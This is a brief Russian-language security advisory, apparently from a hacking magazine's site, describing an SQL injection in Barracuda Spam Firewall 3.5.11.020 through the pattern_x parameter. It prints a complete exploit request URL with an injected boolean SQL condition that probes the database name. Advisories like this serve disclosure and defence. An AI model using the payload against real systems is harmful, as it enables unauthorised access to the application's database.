SQL-инъекция в Barracuda Spam Firewall

Рекомендуем почитать:

Xakep #305. Multi-Step SQLi

Программа: Barracuda Spam Firewall 3.5.11.020, Model 600

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «pattern_x», когда параметр filter_x
установлен в значение «search_count_equals». Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=
USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=
search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0)

SQL-инъекция в Barracuda Spam Firewall

Xakep #305. Multi-Step SQLi

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Кеш из топора. Как производители SSD обманывают тесты и покупателей

NUTS. Расследуем атаку на пакетный менеджер NuGet

Самооборона по-хакерски. Выявляем атаки в Active Directory

HTB Compiled. Эксплуатируем уязвимости в Git и Visual Studio

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

В магазине приложений Amazon Appstore нашли шпионское приложение для Android

Lazarus атакует атомную промышленность новой малварью

СМИ: YouTube могут заблокировать полностью

В США могут запретить продажу оборудования TP-Link

Фишеры используют Google Calendar для обхода спам-фильтров